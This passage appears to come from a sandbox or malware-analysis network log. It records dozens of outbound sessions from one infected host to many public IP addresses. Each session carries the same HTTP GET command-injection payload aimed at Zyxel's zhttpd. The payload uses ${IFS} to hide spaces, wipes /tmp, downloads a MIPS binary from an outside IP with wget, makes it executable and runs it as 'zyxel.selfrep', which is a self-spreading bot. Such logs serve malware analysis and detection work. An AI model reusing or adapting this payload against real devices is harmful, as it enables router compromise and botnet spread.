                                                  Jan 19, 2024 18:24:12.379415035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8468192.168.2.1334358145.182.169.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379465103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8469192.168.2.1339664128.220.67.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379489899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8470192.168.2.1360102223.156.6.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379509926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8471192.168.2.134629861.23.233.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379538059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8472192.168.2.1341182144.21.2.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379570961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8473192.168.2.1338628182.252.59.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379606962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8474192.168.2.1360580109.5.67.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379636049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8475192.168.2.1340368193.122.120.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379729033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8476192.168.2.1348192118.123.127.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379735947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8477192.168.2.1351574124.103.149.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379789114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8478192.168.2.135668476.36.152.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379831076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8479192.168.2.134042452.93.83.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379862070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8480192.168.2.1345226212.127.239.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379916906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8481192.168.2.1342860103.155.5.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379957914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8482192.168.2.1355476205.132.240.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379992008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8483192.168.2.1336382108.29.126.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380038977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8484192.168.2.1350346217.58.8.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380081892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8485192.168.2.135796889.242.135.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380108118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8486192.168.2.133702684.232.37.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380171061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8487192.168.2.133451619.120.144.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380228043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8488192.168.2.1353798121.212.62.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380239010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8489192.168.2.13538465.193.138.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380290031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8490192.168.2.133661835.147.182.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380336046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8491192.168.2.134670869.16.71.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380371094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8492192.168.2.1338330126.28.45.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380428076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8493192.168.2.1334310179.190.52.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380460978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8494192.168.2.1357686159.40.192.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380497932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8495192.168.2.1338606137.232.228.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380537987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8496192.168.2.1350944181.90.84.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380572081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8497192.168.2.1354086148.92.170.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380614042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8498192.168.2.1340904174.204.202.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380634069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8499192.168.2.1358520200.87.28.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380671024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8500192.168.2.133882014.219.199.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380700111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8501192.168.2.134381661.78.33.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380734921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8502192.168.2.134101058.67.49.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380779982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8503192.168.2.1346662111.81.217.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380812883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8504192.168.2.1347280209.213.77.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380862951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8505192.168.2.1339832135.87.37.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380896091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8506192.168.2.1340462205.68.126.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380953074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8507192.168.2.1338002124.239.126.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.380985022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8508192.168.2.134463463.131.252.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381014109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8509192.168.2.1359404203.43.232.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381073952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8510192.168.2.133611058.122.137.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381117105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8511192.168.2.1347364133.185.109.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381145954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8512192.168.2.1339280203.229.252.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381201029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8513192.168.2.1357794140.217.99.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381228924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8514192.168.2.133739492.21.235.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381273031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8515192.168.2.1350518103.76.242.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381311893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8516192.168.2.1334070218.210.13.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381367922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8517192.168.2.1337180156.168.198.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381411076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8518192.168.2.133803471.10.218.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381516933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8519192.168.2.1351324162.129.54.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381545067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8520192.168.2.1353614146.221.49.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381582022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8521192.168.2.1351902140.169.244.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381623983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8522192.168.2.133782638.233.89.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381654024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8523192.168.2.1336914108.36.210.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381681919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8524192.168.2.136063675.200.60.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381731033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8525192.168.2.134645869.52.75.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381757975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8526192.168.2.1358626119.202.80.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381827116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8527192.168.2.1359028198.124.55.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381861925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8528192.168.2.1342342133.142.68.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381920099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8529192.168.2.1339650218.20.92.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.381938934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8530192.168.2.1349518155.254.165.121443
                                                  TimestampBytes transferredDirectionData
